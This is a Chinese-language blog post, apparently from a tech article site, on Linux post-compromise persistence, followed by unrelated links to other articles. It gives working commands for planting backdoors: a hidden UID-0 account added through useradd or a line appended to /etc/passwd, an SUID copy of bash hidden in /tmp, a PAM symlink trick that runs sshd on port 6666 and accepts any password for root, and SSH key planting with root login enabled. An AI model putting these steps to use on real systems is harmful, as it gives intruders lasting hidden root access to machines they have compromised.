linux权限维持

发布时间:2026/10/6 22:51:18

linux权限维持 方法一.特权账号原理就是在系统添加一个root账号Linux的账号信息在/etc/passwd文件里面并且所有人可访问但是密码在/etc/shadow文件里面只有root可访问。/etc/passwd 字段格式格式用户名:密码占位符x:UID:GID:注释信息:家目录:登录ShellUIDUser ID用户 ID作用Linux 内核识别用户的数字编号用户名只是给人看的系统真正认 UID。root 的 UID0唯一超级用户拥有系统全部权限。1‑999系统内置账号daemon、bin 等给后台服务使用一般不允许登录。≥1000普通新建用户。GIDGroup ID组 ID作用用户所属主用户组的数字 ID。创建用户时默认会生成一个同名组GID 对应这个组。多个用户可以属于同一个组用来控制文件 / 目录的组权限rwx 组权限位。格式用户名:加密密码:最后一次改密码日期:最小间隔:最大间隔:警告天数:过期宽限:失效日期:保留注加密密码字段!账号被锁定禁止密码登录*系统账号无有效密码禁止登录$6$xxxxSHA‑512 加密的真实密码哈希最后改密码的天数从 1970‑01‑01 算起的天数我们添加用户直接用useradd命令正常添加用户 useradd 用户名 就行但是添加后的用户没有密码需要passwd命令手动设置但是shell一般无法做交互式的事情所以不能成功执行passwd所以无法ssh这时候就要用到-p参数。-p参数后面要加加密后的密码加密后的密码用openssl命令生成注里面的字符会被当做命令执行opensslpasswd-1-saltsalt123456-1使用 MD5‑crypt 算法加密shadow 里旧版1哈希-salt ‘salt’手动指定盐值为字符串salt123456是待加密明文密码盐 (salt) 核心作用防止彩虹表破解如果没有盐相同密码123456永远输出同一个哈希攻击者提前算好彩虹表直接查表爆破。加盐之后同样密码不同盐得到完全不一样的哈希盐会写入加密的密码前面接下来我们就可以以这个命令生成一个特权用户但是要在root权限生成。# 创建一个用户名guest密码123456的root用户useradd-popensslpasswd-1-saltsalt123456guest-o-u0-groot-Groot-s/bin/bash-d/home/test或者另一种方法直接把构造好的这个东西直接追加到passwd文件中这样就不用管shadow文件了test:$1$test$XazGnbtBRMhBkmTPV1qav/:0:0::/root:/bin/bash二.SUID权限维持SUID 介绍SUID 是一种特殊权限设置了 suid 的程序文件在用户执行该程序时用户的权限是该程序文件属主的权限例如程序文件的属主是 root那么执行该程序的用户就将暂时获得 root 账户的权限。sgid 与 suid 类似只是执行程序时获得的是文件属组的权限。注意以下几点1.只有可以执行的二进制程序文件才能设定 SUID 权限非二进制文件设置 SUID 权限没任何意义。2.命令执行者要对该程序文件拥有执行 (x) 权限。3.命令执行者在执行该程序时获得该程序文件属主的身份。4.SUID 权限只在该程序执行过程中有效也就是说身份改变只在程序执行过程中有效。第一步首先要找到bash文件whereisbash找到bash文件后复制一份出来cp/usr/bin/bash /tmp/.bash然后给加上s权限chmods /tmp/.bash 或chmod4755/tmp/.bash接下来就可以使用这个bash以root身份运行/tmp/.bash-p注意有的系统默认tmp是会忽略所有带s的参数以防suid攻击可以把后门放在其他目录例如home可以使用mount命令查看例如里面tmp目录就有nosuid所有不能再这个目录使用这个维持方法三.pam软链接维权注意1.可复现万能密码PAM 劫持生效OpenSSH ≤9.3p12.而且如果时centos系统需要修改/etc/selinux/config文件中的SELINUX“” 为 disabled3.如果依旧失败记得查看防火墙是不是开了ssh-V软链接一种特殊文件相当于快捷方式里面保存另一个文件的路径。访问软链接就等价访问源文件执行软链接时系统拿到的启动文件名是链接自身名字而非源程序。源文件删除后软链接失效。PAMLinux 的统一认证框架负责登录、权限校验。程序运行时根据调用的程序文件名加载 /etc/pam.d/ 下同名配置文件调用各类认证模块。pam_rootok.so是其中模块进程为 root 用户时直接认证通过跳过密码验证。1.我们通过建立一个ssh的后门首先需要看一下ssh是否使用pam模块验证默认支持ls/etc/pam.d然后看一下ssh是否启用了pamcat/etc/ssh/sshd_config|grepUsePAM 2.看一下哪些模块支持pam_rootok.sofind/etc/pam.d|xargsgreppam_rootok.so#xargs命令是把管道前面的每行结果当参数给xargs后面的命令3.例如上面的chsh支持pam_rootok.so模块ln-sf/usr/sbin/sshd /tmp/chsh;/tmp/chsh-oPort6666注意这里解释一下ln -sf /usr/sbin/sshd /tmp/chsh这行命令就是创建一个叫chsh的快捷方式而不是把chsh复制过去。因为pam在运行时会依据文件名来选择同名配置文件。使用叫chsh的文件名pam就会调用他的配置文件而chsh的配置文件支持pam_rootok.so模块。即只要以root身份去ssh那么建立进程的用户就是root而pam_rootok.so模块检测到root就直接验证成功不需要再验证密码了所以会直接成功登录。4.此时后门就建立了sshroot192.168.85.135-p6666密码验证时无论输入什么都成功不能直接回车必须随便输入点什么四.利用公私钥实现ssh维权1.步骤1在本地生成SSH密钥对在主机A上打开终端输入以下命令ssh-keygen-trsa在提示输入密钥密码时直接回车2.修改ssh配置文件vim/etc/ssh/sshd_config这三个权限一定要打开很多设置默认是注释掉的需要去掉注释打开权限PubkeyAuthentication yes // 授权公钥登录AuthorizedKeysFile .ssh/authorized_keys // 授权文件路径PasswordAuthentication yes // 密码授权PermitRootLogin yes /允许root进行ssh登录3.把公钥放到被控主机执行命令放入ssh-copy-id usernameserver_ip或者进入/root/.ssh手动放入公钥放入后必须改名为authorized_keys4.放入后就可以ssh了****
延伸阅读

更多相关文章

2026/10/5 20:35:47

NeurlPS 2025 | CHOICE:大型视觉-语言模型的遥感能力评估

文章目录1.论文信息2.论文主要贡献3.论文创新点4.研究方法4.1 总体概览4.2 层次能力分类法4.2.1 感知4.2.2 推理4.3 构建CHOICE5.实验验证5.1 主要结果5.2 细粒度分析5.3 结论6.个人声明1.论文信息 论文题目:CHOICE: Benchmarking the Remote Sensing Capabilities…

2026/10/5 20:29:21

南京百度网站建设多少钱?深度解析中小企业如何通过南京百度网站建设实现低成本高效率获客与品牌升级

在这个数字化浪潮汹涌的时代,很多企业老板每天都在思考同一个问题:为什么我的产品很好,服务也很棒,但在互联网上却像石沉大海,听不见一点响动?尤其是在南京这座六朝古都,历史文化底蕴深厚,现代商业活力十足,无数优质的中小企业在这里扎根。然而,很多老板发现,即使手…

2026/10/6 22:49:51

WSL多环境完全指南:多发行版安装、复制与Docker导入实战

Windows 上装了 WSL 之后,很多人都会产生同一个疑问:一台机器上到底能不能同时跑好几个不同的 Linux 环境?我最早用 WSL 时也以为它只能装一个 Ubuntu,直到后来做项目需要同时用 Ubuntu、Debian 和 Kali 才去认真研究多发行版的玩…

2026/10/6 22:49:51

Redis缓存设计实战:穿透、击穿、雪崩与一致性全解

做过几年后端,跟缓存打了太多照面。有一次线上事故印象特别深:一个读接口平时响应 50ms,因为并发上来,团队决定加一层 Redis 缓存。结果加完之后,接口响应直接飙到 800ms,数据库倒是没事了,Redi…

2026/10/6 22:49:51

UDP Socket编程实战:用Linux手写一个无状态字典服务

前阵子做Linux下的Socket编程练习,把之前课程设计里的TCP版词典服务重写了一遍,这次干脆换成了UDP协议。项目核心很简单:一个运行在Linux上的Dict Server,客户端发来一个英文单词,服务端在本地词典里查一下&#xff0c…

2026/10/6 22:49:51

TCP/IP协议栈实战:从分层原理到三次握手与抓包排查

先给你一个我们实际推演过的类比:TCP/IP协议栈就像一家快递公司的完整物流体系。包裹从你手里发出,经过营业部、分拣中心、干线运输、末端派送,最终送到对方手上。TCP/IP协议栈干的就是同一件事——只不过它送的包裹是数据,全局没…

2026/10/6 22:44:50

角度转弧度节点深度拆解:数学原理、游戏引擎与ComfyUI应用

1. 先把这个“角度转弧度”节点聊明白做可视化编程的朋友,几乎都绕不过DegreesToRadians这个节点。不管你是玩Unreal蓝图、Unity的Visual Scripting、Godot的可视化脚本,还是用ComfyUI搭图像处理工作流,只要涉及旋转、朝向、圆形分布这类数学…

2026/10/5 6:32:56

Jev+Agent接管浏览器:browser-use实战与jev-ultrafast性能优化

1. 从“Jev”说起:为什么我要把Agent接进浏览器“Jev”这个词最近在圈子里出现的频率越来越高,很多人第一次听到会以为是某个新模型的名字,其实它更像是一种思路——把Jev模型的能力当作底座,通过Agent的方式去接管浏览器&#xf…

2026/10/6 4:01:51

多智能体集群实战:DeepAgents编排、MCP与A2A协议及Skills体系

1. 从"单兵作战"到"集群协同":多智能体编排到底在解决什么问题如果你最近在折腾 Agent 相关的东西,大概率会有一种感觉:单个 Agent 能做的事情,其实很快就摸到天花板了。你给它一个提示词,挂几个工…

2026/10/6 17:46:51

无源低通滤波器设计实战:从RC到LC,手把手教你避开那些坑

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/6 0:03:23

MR25H40CDF+STM32F031C6工业级高可靠数据存储方案

1. 项目概述:为什么在工业现场非得用 MR25H40CDF 配 STM32F031C6 做数据存储?在工厂产线的 PLC 控制柜里、在风电变流器的散热片背面、在矿井监测终端的金属外壳下,你经常能看到一块指甲盖大小的黑色芯片——它既不是 Flash,也不是…

2026/10/6 0:03:23

MRAM+STM32工业断电数据保全实战指南

1. 项目概述:为什么在工业现场非得用 MR25H40CDF 配 STM32F031C6 做数据存储?在工厂产线的PLC柜里、在野外无人值守的环境监测终端里、在高速运转的包装机控制板上,你经常能看到一块指甲盖大小的黑色芯片,旁边贴着“MR25H40CDF”丝…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
☎咨询二维码 ☎ ↑